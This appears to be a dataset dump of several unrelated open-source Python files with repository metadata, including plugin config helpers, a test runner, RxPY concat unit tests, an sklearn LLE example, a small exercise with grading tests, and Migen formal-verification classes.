blob_id (string, length 40) | directory_id (string, length 40) | path (string, length 3–288) | content_id (string, length 40) | detected_licenses (list, length 0–112) | license_type (string, 2 classes) | repo_name (string, length 5–115) | snapshot_id (string, length 40) | revision_id (string, length 40) | branch_name (string, 684 classes) | visit_date (timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38) | revision_date (timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00) | committer_date (timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06) | github_id (int64, 4.92k – 681M, nullable) | star_events_count (int64, 0 – 209k) | fork_events_count (int64, 0 – 110k) | gha_license_id (string, 22 classes) | gha_event_created_at (timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable) | gha_created_at (timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable) | gha_language (string, 147 classes) | src_encoding (string, 25 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 128 – 12.7k) | extension (string, 142 classes) | content (string, length 128 – 8.19k) | authors (list, length 1) | author_id (string, length 1–132)
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3ad2dd87828157dd063f2b7458571a524017263a
|
833ae432c07ff3c33812b4847c247aa730a2549b
|
/glue/_plugin_helpers.py
|
341fbd440fc91bad6628fe8c03f9dba38fea1a07
|
[
"BSD-3-Clause"
] |
permissive
|
scalet98/glue
|
3e4bc49ac53766d4e1927da3434ad02410d93486
|
ff949ad52e205c20561f48c05f870b2abb39e0b0
|
refs/heads/master
| 2020-11-25T07:50:11.278074
| 2019-10-29T09:23:19
| 2019-10-29T09:23:19
| 228,563,694
| 1
| 0
|
NOASSERTION
| 2019-12-17T07:58:31
| 2019-12-17T07:58:31
| null |
UTF-8
|
Python
| false
| false
| 2,776
|
py
|
# The following function is a thin wrapper around iter_entry_points. The reason it
# is in this separate file is that when making the Mac app, py2app doesn't
# support entry points, so we replace this function with a version that has the
# entry points we want hardcoded. If this function was in glue/main.py, the
# reference to the iter_plugin_entry_points function in load_plugin would be
# evaluated at compile time rather than at runtime, so the patched version
# wouldn't be used.
from __future__ import absolute_import, division, print_function
import os
from collections import defaultdict
def iter_plugin_entry_points():
from pkg_resources import iter_entry_points
return iter_entry_points(group='glue.plugins', name=None)
class PluginConfig(object):
def __init__(self, plugins={}):
self.plugins = defaultdict(lambda: True)
self.plugins.update(plugins)
def __str__(self):
string = ""
for plugin in sorted(self.plugins):
string += "{0}: {1}\n".format(plugin, self.plugins[plugin])
return string
@classmethod
def load(cls):
# Import at runtime because some tests change this value. We also don't
# just import the variable directly otherwise it is cached.
from glue import config
cfg_dir = config.CFG_DIR
plugin_cfg = os.path.join(cfg_dir, 'plugins.cfg')
from glue.external.six.moves import configparser
config = configparser.ConfigParser()
read = config.read(plugin_cfg)
if len(read) == 0 or not config.has_section('plugins'):
return cls()
plugins = {}
for name, enabled in config.items('plugins'):
plugins[name] = bool(int(enabled))
self = cls(plugins=plugins)
return self
def save(self):
# Import at runtime because some tests change this value. We also don't
# just import the variable directly otherwise it is cached.
from glue import config
cfg_dir = config.CFG_DIR
plugin_cfg = os.path.join(cfg_dir, 'plugins.cfg')
from glue.external.six.moves import configparser
config = configparser.ConfigParser()
config.add_section('plugins')
for key in sorted(self.plugins):
config.set('plugins', key, value=str(int(self.plugins[key])))
if not os.path.exists(cfg_dir):
os.mkdir(cfg_dir)
with open(plugin_cfg, 'w') as fout:
config.write(fout)
def filter(self, keep):
"""
Keep only certain plugins.
This is used to filter out plugins that are not installed.
"""
        for key in list(self.plugins.keys()):
if key not in keep:
self.plugins.pop(key)
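# A minimal usage sketch (not part of the original module; it assumes a
# writable config.CFG_DIR and a hypothetical plugin name 'example_plugin'):
#
#     cfg = PluginConfig.load()
#     cfg.plugins['example_plugin'] = False  # disable one plugin
#     cfg.save()                             # persisted to CFG_DIR/plugins.cfg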
|
[
"thomas.robitaille@gmail.com"
] |
thomas.robitaille@gmail.com
|
3479e119a928a44bfb4b30588b082226216cfa06
|
97bf09cf62ddd060ec436bc0abdda8a1a78e57f9
|
/scripts/test/run_tests.py
|
4392a92d799968c527d36b1bb61228cda313639e
|
[
"BSD-3-Clause"
] |
permissive
|
Hiwatts/facebook360_dep
|
1911848900d6be6eabe72a088bab9cf7eae6ef02
|
3ecbe7f64f88b8a7b50bfa3deef6daad61a30443
|
refs/heads/master
| 2023-07-24T05:48:44.705469
| 2021-05-05T15:57:32
| 2021-05-05T16:04:43
| 396,123,779
| 0
| 0
|
NOASSERTION
| 2021-08-18T11:48:09
| 2021-08-14T20:35:58
| null |
UTF-8
|
Python
| false
| false
| 5,371
|
py
|
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
"""Runs all the unit tests defined in res/test/translator.json.
This is the main entrypoint for running the comprehensive test suite defined across
our applications. All the scripts desired by the specified "type" CLI argument will be run from
the test/ directory. If only a certain subset of the tests are desired, this can be specified in
a separate .json file and passed using the --static CLI flag.
Example:
For running all the CPU tests, use:
$ python run_tests.py \
    --type=cpu \
--binary_dir=/path/to/facebook360_dep/build/bin \
--dataset_root=s3://example/dataset
For running a statically-defined subset of the GPU tests, use:
$ python run_tests.py \
--type=gpu \
--static=/path/to/facebook360_dep/static.json \
--binary_dir=/path/to/facebook360_dep/build/bin \
--dataset_root=s3://example/dataset
"""
import json
import os
import sys
from pathlib import Path
from .test_align_colors import AlignColorsTest
from .test_calibration import CalibrationTest
from .test_calibration_lib_main import CalibrationLibMainTest
from .test_convert_to_binary import ConvertToBinaryTest
from .test_derp_cli import DerpCLITest
from .test_export_point_cloud import ExportPointCloudTest
from .test_generate_camera_overlaps import GenerateCameraOverlapsTest
from .test_generate_foreground_masks import GenerateForegroundMasksTest
from .test_import_point_cloud import ImportPointCloudTest
from .test_layer_disparities import LayerDisparitiesTest
from .test_master_class import generic_main, parser
from .test_project_equirects_to_cameras import ProjectEquirectsToCamerasTest
from .test_raw_to_rgb import RawToRgbTest
from .test_rig_aligner import RigAlignerTest
from .test_rig_analyzer import RigAnalyzerTest
from .test_rig_compare import RigCompareTest
from .test_rig_simulator import RigSimulatorTest
from .test_simple_mesh_renderer import SimpleMeshRendererTest
from .test_upsample_disparity import UpsampleDisparityTest
try:
import networkx as nx
load_static = False
except Exception:
load_static = True
def get_ordered_tests(tests_setup, test_type):
"""Determines the order of tests to be run, filtered to only return the specified type.
Args:
tests_setup (dict): Map of test name to its configuration (see: res/test/translator.json).
test_type (str): Which apps are to be tested. Must be one of "cpu", "gpu", or "both".
Returns:
list[str]: Names of the applications in the order they are to be run.
"""
test_graph = nx.DiGraph()
for test_app in tests_setup:
tests = tests_setup[test_app]
for test in tests:
if "truth" in test:
output_node = test["truth"]
else:
output_node = f"placeholder_{test_app}"
test_graph.add_nodes_from(test["datasets"])
test_graph.add_nodes_from([output_node])
for dataset in test["datasets"]:
if test_type == "both" or test["type"] == test_type:
print(dataset, output_node)
test_graph.add_edge(dataset, output_node, name=test_app)
ordered_nodes = list(nx.topological_sort(test_graph))
ordered_tests = []
for node in ordered_nodes:
for neighbor in test_graph.neighbors(node):
test_app = test_graph.get_edge_data(node, neighbor)["name"]
if test_app not in ordered_tests:
ordered_tests.append(test_app)
return ordered_tests
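# Sketch of the ordering logic above on hypothetical data (the real shape
# lives in res/test/translator.json; the names here are made up):
#
#     tests_setup = {
#         "CalibrationTest": [{"type": "cpu", "datasets": ["rig_raw"], "truth": "rig_calibrated"}],
#         "DerpCLITest": [{"type": "cpu", "datasets": ["rig_calibrated"]}],
#     }
#     get_ordered_tests(tests_setup, "cpu")  # -> ["CalibrationTest", "DerpCLITest"]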
def run_tests(loader=None, res_dir=None):
"""Runs tests of the variant specified by CLI arguments. If "cpu" is specified,
CPU-only tests will be run and similarly for "gpu." Both are run if "both" is
passed in. If "static" is specified, the tests are run per their order in the
given static json file. Otherwise, the test order is automatically determined.
"""
parser.add_argument(
"--type", help="Type of tests to run (one of: cpu, gpu, both)", required=True
)
parser.add_argument(
"--static",
help="Static json w/ list of tests (use ONLY if NetworkX unavailable)",
)
args = parser.parse_args()
if not res_dir:
res_dir = os.path.join(
Path(os.path.abspath(__file__)).parents[2], "res", "test"
)
translator_path = os.path.join(res_dir, "translator.json")
with open(translator_path) as f:
tests_setup = json.load(f)
if load_static or args.static:
with open(args.static, "r") as f:
ordered_json = json.load(f)
ordered_tests = []
if (args.type == "both" or args.type == "cpu") and "cpu" in ordered_json:
ordered_tests += ordered_json["cpu"]
if (args.type == "both" or args.type == "gpu") and "gpu" in ordered_json:
ordered_tests += ordered_json["gpu"]
else:
ordered_tests = get_ordered_tests(tests_setup, args.type)
test_classes = []
for test in ordered_tests:
test_classes.append(getattr(sys.modules[__name__], test))
generic_main(test_classes, loader, res_dir)
if __name__ == "__main__":
run_tests()
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
68be4a145f5591cd39cece0984dc6931714f5716
|
44c65c93549aa06b01ef9114817cd45e645da6f7
|
/tests/test_observable/test_concat.py
|
7b28c6f1c9fd20302717129da1983eaa60fd0f1c
|
[
"Apache-2.0"
] |
permissive
|
Affirm/RxPY
|
692b6a0089f4e79b92c0c683f11427c558eefd06
|
7c23939ea497761c85b382257f9f0954998ab91e
|
refs/heads/master
| 2023-07-06T11:34:28.229747
| 2017-10-22T16:25:56
| 2017-10-22T16:25:56
| 108,198,347
| 0
| 2
|
Apache-2.0
| 2023-03-20T20:28:56
| 2017-10-25T00:18:37
|
Python
|
UTF-8
|
Python
| false
| false
| 7,099
|
py
|
import unittest
from rx import Observable
from rx.testing import TestScheduler, ReactiveTest
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
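# Note: scheduler.start() subscribes at virtual time 200 and disposes at 1000
# (the ReactiveTest defaults aliased above), so messages stamped at time 150
# are published before subscription and never appear in the expected results.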
class RxException(Exception):
pass
# Helper function for raising exceptions within lambdas
def _raise(ex):
raise RxException(ex)
class TestConcat(unittest.TestCase):
def test_concat_empty_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_completed(250))
def test_concat_empty_never(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_never_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e2.concat(e1)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_never_never(self):
scheduler = TestScheduler()
e1 = Observable.never()
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_empty_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_error(250, ex)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(250, ex))
def test_concat_throw_empty(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_throw_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_error(250, 'ex2')]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_return_empty(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_completed(250))
def test_concat_empty_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_completed(230)]
msgs2 = [on_next(150, 1), on_next(240, 2), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(240, 2), on_completed(250))
def test_concat_return_never(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2))
def test_concat_never_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_completed(230)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = Observable.never()
def create():
return e2.concat(e1)
results = scheduler.start(create)
results.messages.assert_equal()
def test_concat_return_return(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(220, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_next(240, 3), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(220, 2), on_next(240, 3), on_completed(250))
def test_concat_throw_return(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_error(230, ex)]
msgs2 = [on_next(150, 1), on_next(240, 2), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_error(230, ex))
def test_concat_return_throw(self):
ex = 'ex'
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(220, 2), on_completed(230)]
msgs2 = [on_next(150, 1), on_error(250, ex)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(220, 2), on_error(250, ex))
def test_concat_some_data_some_data(self):
scheduler = TestScheduler()
msgs1 = [on_next(150, 1), on_next(210, 2), on_next(220, 3), on_completed(225)]
msgs2 = [on_next(150, 1), on_next(230, 4), on_next(240, 5), on_completed(250)]
e1 = scheduler.create_hot_observable(msgs1)
e2 = scheduler.create_hot_observable(msgs2)
def create():
return e1.concat(e2)
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, 2), on_next(220, 3), on_next(230, 4), on_next(240, 5), on_completed(250))
|
[
"dag@brattli.net"
] |
dag@brattli.net
|
3d37da637d2574b7f62ac05306ea06e985dab24c
|
ae10b60cb92a69146bfb05ef5dde735a0aa45d4b
|
/examples/Extended Application/sklearn/examples/manifold/plot_swissroll.py
|
7c79aa7f21f247e89add004d85ca228061582301
|
[
"MIT"
] |
permissive
|
kantel/nodebox-pyobjc
|
471cea4c5d7f1c239c490323186458a74edcc214
|
068ba64c87d607522a240ab60c3ba14f869f6222
|
refs/heads/master
| 2021-08-14T18:32:57.995445
| 2017-11-16T13:42:23
| 2017-11-16T13:42:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,103
|
py
|
"""
===================================
Swiss Roll reduction with LLE
===================================
An illustration of Swiss Roll reduction
with locally linear embedding
"""
# Author: Fabian Pedregosa -- <fabian.pedregosa@inria.fr>
# License: BSD 3 clause (C) INRIA 2011
print(__doc__)
import matplotlib.pyplot as plt
# This import is needed to modify the way figure behaves
from mpl_toolkits.mplot3d import Axes3D
Axes3D
# nodebox section
if __name__ == '__builtin__':
    # we're in nodebox
import os
import tempfile
W = 800
inset = 20
size(W, 600)
plt.cla()
plt.clf()
plt.close('all')
def tempimage():
fob = tempfile.NamedTemporaryFile(mode='w+b', suffix='.png', delete=False)
fname = fob.name
fob.close()
return fname
imgx = 20
imgy = 0
def pltshow(plt, dpi=150):
global imgx, imgy
temppath = tempimage()
plt.savefig(temppath, dpi=dpi)
dx,dy = imagesize(temppath)
w = min(W,dx)
image(temppath,imgx,imgy,width=w)
imgy = imgy + dy + 20
os.remove(temppath)
size(W, HEIGHT+dy+40)
else:
def pltshow(mplpyplot):
mplpyplot.show()
# nodebox section end
#----------------------------------------------------------------------
# Locally linear embedding of the swiss roll
from sklearn import manifold, datasets
X, color = datasets.samples_generator.make_swiss_roll(n_samples=1500)
print("Computing LLE embedding")
X_r, err = manifold.locally_linear_embedding(X, n_neighbors=12,
n_components=2)
print("Done. Reconstruction error: %g" % err)
#----------------------------------------------------------------------
# Plot result
fig = plt.figure()
ax = fig.add_subplot(211, projection='3d')
ax.scatter(X[:, 0], X[:, 1], X[:, 2], c=color, cmap=plt.cm.Spectral)
ax.set_title("Original data")
ax = fig.add_subplot(212)
ax.scatter(X_r[:, 0], X_r[:, 1], c=color, cmap=plt.cm.Spectral)
plt.axis('tight')
plt.xticks([]), plt.yticks([])
plt.title('Projected data')
# plt.show()
pltshow(plt)
|
[
"karstenwo@web.de"
] |
karstenwo@web.de
|
9bad6a345a6bdffa026f01429de7892977c34495
|
fd64e364368bcb2cdcf77ab1e0fc234a6b698f69
|
/Python/Easy/CHEFSETC.py
|
48d298e8c44654557290eaf4fd4a08a2753e58f3
|
[] |
no_license
|
Parizval/CodeChefCodes
|
57712069f3d56cc42282f9e35c6ddd9398e4a5bf
|
cfd2876816be806882650b6ea51431b1f8d6bec5
|
refs/heads/master
| 2021-07-16T13:10:15.668713
| 2020-07-06T21:40:09
| 2020-07-06T21:40:09
| 188,693,667
| 5
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import itertools
def findsubsets(s, n):
return [set(i) for i in itertools.combinations(s, n)]
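# Reads t test cases; for each, prints "Yes" if some subset of the input
# values (of size 1 to 4) sums to zero, else "No". (Summary inferred from the
# code below; the original file carried no problem statement.)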
for a in range(int(input())):
elements = set(map(int,input().split()))
check = False
    for size in range(1, 5):
        subsets = findsubsets(elements, size)
        for subset in subsets:
            if sum(subset) == 0:
                # print(subset)
                check = True
                break
if check:
break
if check:
print("Yes")
else:
print("No")
|
[
"anmolgoyal@gmail.com"
] |
anmolgoyal@gmail.com
|
42b03dcc9562188ff8a81630422edb51674a221c
|
2c54320b0bebb4351d6056d117796c11b6fb1441
|
/test_endpoints.py
|
5511b26bb32d7594a6d5ed3116bbdfc142a99fdb
|
[] |
no_license
|
Amertz08/flask-ci
|
f728ca59c67d24b5d437de8acd469d2460151f01
|
a67c0417345b6b67f86d7f18d509f1f192cf862a
|
refs/heads/master
| 2020-03-23T08:53:14.389682
| 2018-07-18T02:18:29
| 2018-07-18T02:18:29
| 141,353,864
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 582
|
py
|
import unittest
from flask import url_for
from flask_testing import TestCase
from app import create_app
class TestApp(TestCase):
def create_app(self):
return create_app()
def test_index(self):
resp = self.client.get(url_for('main.index'))
try:
with open('version.txt', 'r') as f:
_hash = f.read()
except FileNotFoundError:
_hash = 'version.txt not found'
self.assert200(resp)
self.assertEqual(resp.data, f'Hello {_hash}'.encode())
if __name__ == '__main__':
unittest.main()
|
[
"adammertz@gmail.com"
] |
adammertz@gmail.com
|
b7cd1f9a1aea1fcef7d9de69a39850cb6d63dafc
|
ff6248be9573caec94bea0fa2b1e4b6bf0aa682b
|
/log-20190927/132.230.102.123-10.21.12.20/1569574219.py
|
4a95238224a8297f24bd861789148dd266556edb
|
[] |
no_license
|
LennartElbe/codeEvo
|
0e41b1a7705204e934ef71a5a28c047366c10f71
|
e89b329bc9edd37d5d9986f07ca8a63d50686882
|
refs/heads/master
| 2020-12-21T17:28:25.150352
| 2020-03-26T10:22:35
| 2020-03-26T10:22:35
| 236,498,032
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,653
|
py
|
import functools
import typing
import string
import random
import pytest
## Solution, part 1.
def divisors(n)->list:
teiler = []
if n < 0:
return "Ungültige Eingabe"
else:
for i in range(1, n+1):
if n%i == 0:
teiler = teiler + [i]
        return teiler
######################################################################
## hidden code
def mk_coverage():
covered = set()
target = set(range(6))
count = 0
def coverage(func):
nonlocal covered, target, count
def wrapper(n):
nonlocal covered, count
if n <= 0:
covered.add(0)
if n == 1:
covered.add(1)
r = func (n)
lenr = len (r)
if lenr == 1:
covered.add(2)
if lenr == 2:
covered.add(3)
if (lenr > 2) and ( lenr % 2 == 0):
covered.add(4)
if lenr > 2 and lenr % 2 == 1:
covered.add(5)
count += 1
return r
if func == "achieved": return len(covered)
if func == "required": return len(target)
if func == "count" : return count
if func.__doc__:
wrapper.__doc__ = func.__doc__
wrapper.__hints__ = typing.get_type_hints (func)
return wrapper
return coverage
coverage = mk_coverage()
try:
divisors = coverage(divisors)
except:
pass
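# After the tests run, the wrapper above can be queried through its string
# protocol: coverage("achieved") vs. coverage("required") counts the branch
# classes that were hit (this is what TestGrades.test_coverage checks below).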
## Solution, part 2. (tests)
def test_divisors():
    assert divisors(1) == [1]
    assert divisors(5) == [1, 5]
    assert divisors(10) == [1, 2, 5, 10]
######################################################################
## hidden tests
pytest.main (["-v", "--assert=plain", "-p", "no:cacheprovider"])
from inspect import getfullargspec
class TestNames:
def test_divisors (self):
assert divisors
assert 'n' in getfullargspec(divisors).args
class TestGrades:
def test_docstring_present(self):
assert divisors.__doc__ is not None
def test_typing_present(self):
assert divisors.__hints__ == typing.get_type_hints(self.divisors_oracle)
def test_coverage(self):
assert coverage("achieved") == coverage("required")
def divisors_oracle(self, n:int)->list:
return [ d for d in range (1, n + 1) if n % d == 0 ]
def check_divisors (self, x):
assert set(divisors (x)) == set(self.divisors_oracle (x))
def test_correctness(self):
for i in range (100):
self.check_divisors (i)
n = random.randrange (10000)
self.check_divisors (n)
|
[
"lenni.elbe@gmail.com"
] |
lenni.elbe@gmail.com
|
a8b53a582053bf011063b816014242b9cc4b3276
|
a34dc024004dded61c9a5612e047fc4537534ddb
|
/scripts/utils.py
|
ca1dc8ab17fc6a2132b90e53bb34b9903dcce3b4
|
[] |
no_license
|
tehZevo/aegis-scripts
|
29ca28998f3fb2c6c8f7960ef56df8bff5e9970d
|
280435890fc7661e73aff65ef28bd9b2a5b24055
|
refs/heads/master
| 2020-07-21T12:23:55.913579
| 2020-03-06T01:26:40
| 2020-03-06T01:26:40
| 206,863,972
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,183
|
py
|
from tensorflow.keras import optimizers as O
import retro
import gym
from aegis_core.callbacks import TensorboardFieldCallback, TensorboardCallback
from aegis_core.callbacks import TensorboardActions, TensorboardPGETReward
from aegis_core.callbacks import TensorboardPGETWeights, TensorboardPGETTraces
class DummyEnv(gym.Env):
def __init__(self, obs_space, action_space):
self.observation_space = obs_space
self.action_space = action_space
def list_retro_games(filter=None):
games = retro.data.list_games()
for game in games:
if filter is None or filter in game.lower():
print(game)
optis = {
"sgd": O.SGD,
"rmsprop": O.RMSprop,
"adagrad": O.Adagrad,
"adadelta": O.Adadelta,
"adam": O.Adam,
"adamax": O.Adamax,
"nadam": O.Nadam
}
def create_optimizer(args):
if args.optimizer is not None:
return optis[args.optimizer](args.learning_rate, clipnorm=args.clipnorm)
return "sgd" #sigh
def env_callbacks(summary_writer, env_name, interval="done"):
cbs = [
#log sum of rewards every episode
TensorboardFieldCallback(summary_writer, "reward", name_format="{}/" + env_name,
reduce="sum", interval=interval, step_for_step=False),
#log action distribution every episode
TensorboardActions(summary_writer, env_name=env_name, interval=interval,
step_for_step=False),
]
return cbs
def pget_callbacks(summary_writer, name, interval=100, outlier_z=2):
cbs = [
TensorboardPGETWeights(summary_writer, name, interval=interval,
combine=False, step_for_step=True),
TensorboardPGETTraces(summary_writer, name, interval=interval,
combine=False, step_for_step=True, outlier_z=outlier_z),
TensorboardPGETReward(summary_writer, name, interval=interval,
step_for_step=True),
]
return cbs
def curiosity_callbacks(summary_writer, name, interval=100):
cbs = [
TensorboardFieldCallback(summary_writer, "loss", name_format=name + " curiosity/{}",
reduce="mean", interval=interval, step_for_step=True),
TensorboardFieldCallback(summary_writer, "surprise", name_format=name + " curiosity/{}",
reduce="mean", interval=interval, step_for_step=True),
]
return cbs
|
[
"tehzevo@users.noreply.github.com"
] |
tehzevo@users.noreply.github.com
|
d9bee4ad7b23f641753a2fe3e8fa91e75064ef95
|
4f41601218f7c270a9b1bb0b02a45522dfb586df
|
/miform/structure.py
|
74b867359fe58dc888aa44f38c23b1ce2fe4bec6
|
[] |
no_license
|
cr1901/miform
|
3e7372cf5f5d2ece04b5df17f8582ed2795ada1f
|
23abfbe16a5064cbd267719ebbb66e08f594b689
|
refs/heads/master
| 2021-07-13T08:58:18.657665
| 2017-10-15T18:01:03
| 2017-10-15T18:01:03
| 106,760,269
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,706
|
py
|
from migen.fhdl.structure import _Statement, wrap, _check_statement
from migen.fhdl.specials import Special
from migen.fhdl.verilog import _AT_BLOCKING, _printexpr as verilog_printexpr
from migen.fhdl.module import _flat_list, _cd_append
import miform.verilog
class _FormalStatement:
pass
class _FormalTask:
def __init__(self):
pass
def to_system_verilog(self):
raise NotImplementedError
class Formal(Special):
"""
The Migen Special for formal verification. This is mainly required to
place all formal statements in their own block.
"""
def __init__(self):
Special.__init__(self)
self.init = list()
self.imm = list()
self.conc = list()
self.glob = list()
self.sync = dict()
"""
Add an assertion or assumption for formal verification purposes.
Parameters
----------
statement : _Statement(), in
A Migen Statement that contains a _FormalStatement such as Assume or Assert;
such statements are tested only when the conditions for the Assume/Assert
are met.
The statement itself can also be a _FormalStatement; these statements
    are continuously assumed to be true or tested to be true, at all clock ticks.
"""
def add(self, statement):
if not _check_statement(statement):
raise TypeError("Input to Formal specials must be Migen statements")
if isinstance(statement, _FormalStatement):
if statement.initial:
# Initial asserts/assumes look similar to concurrent, though
# the initial "block" is considered an event (I think?).
self.init.append(statement)
else:
# Top-level formal asserts/assumes not bound by other events- i.e.
# checked for all time- are by definition concurrent.
self.conc.append(statement)
else:
# TODO: ensure at least one statement in list is a _FormalStatement.
self.imm += _flat_list(statement)
"""Add an assertion using the SystemVerilog $globalclock task. This is the implied clock
during formal verification; in `yosys`, if the `clk2dfflogic` pass
is executed, all other Migen clock domains, including the default "sys"
clock domain, become synchronous inputs relative to the $global_clock.
Parameters
----------
statement : _Statement(), in
A Migen Statement that is asserted/assumed each tick of the $global_clock.
"""
def add_global(self, statement):
self.glob += _flat_list(statement)
"""Add an assertion that is checked on the positive-edge of the input
clock domain.
Parameters
----------
cd : str, in
Name of the clock-domain for which the assertion/assumption is checked.
statement : _Statement(), in
A Migen Statement that is asserted/assumed each positive-edge of the named `cd`.
"""
def add_sync(self, cd, statement):
_cd_append(self.sync, cd, statement)
@staticmethod
def emit_verilog(formal, ns, add_data_file):
def pe(e):
return verilog_printexpr(ns, e)[0]
r = "`ifdef FORMAL\n"
for i in formal.init:
if isinstance(i, Assert):
r += "initial assert (" + pe(i.cond) + ");\n"
elif isinstance(i, Assume):
r += "initial assume (" + pe(i.cond) + ");\n"
r += "\n"
for c in formal.conc:
if isinstance(c, Assert):
r += "assert property (" + pe(c.cond) + ");\n"
elif isinstance(c, Assume):
r += "assume property (" + pe(c.cond) + ");\n"
else:
TypeError("Only Assume and Assert supported for concurrent assertions.")
r += "\n"
for i in formal.imm:
r += "always @(*) begin\n"
r += miform.verilog._formalprintnode(ns, _AT_BLOCKING, 1, i)
r += "end\n"
r += "\n"
r += miform.verilog._formalprintsync(formal, ns)
r += "\n"
for g in formal.glob:
r += "always @($global_clock) begin\n"
r += miform.verilog._formalprintnode(ns, _AT_BLOCKING, 1, g)
r += "end\n"
r += "`endif\n"
return r
class Assert(_Statement, _FormalStatement):
"""Assert a condition
Parameters
----------
cond : _Value(1), in
Condition
initial : bool, in
Only test the assertion on the first cycle. Defaults to false.
Ignored if the assert is not continuous.
Examples
--------
>>> a = Signal()
>>> b = Signal()
>>> c = Signal()
>>> If(c,
... Assert(a == b)
... )
"""
def __init__(self, cond, initial=False):
self.cond = wrap(cond)
self.initial = initial
class Assume(_Statement, _FormalStatement):
"""Assume a condition holds
Parameters
----------
cond : _Value(1), in
Condition
initial : bool, in
Only assume `cond` on the first cycle. Defaults to false.
Ignored if the assume is not continuous.
Examples
--------
>>> a = Signal()
>>> Assume(a == 0)
"""
def __init__(self, cond, initial=False):
self.cond = wrap(cond)
        self.initial = initial
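# A hedged usage sketch (not from this file; it assumes a Migen module `m`
# with a 1-bit Signal `flag`):
#
#     f = Formal()
#     f.add(Assert(flag, initial=True))     # checked only in the initial state
#     f.add_sync("sys", Assume(flag == 0))  # assumed at each "sys" posedge
#     m.specials += f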
# class GlobalClock(_Statement, _FormalStatement, _FormalTask):
# """The SystemVerilog $globalclock task. This is the implied clock
# during formal verification; in `yosys`, if the `clk2dfflogic` pass
# is executed, all clock domains become synchronous relative to the
# global clock."""
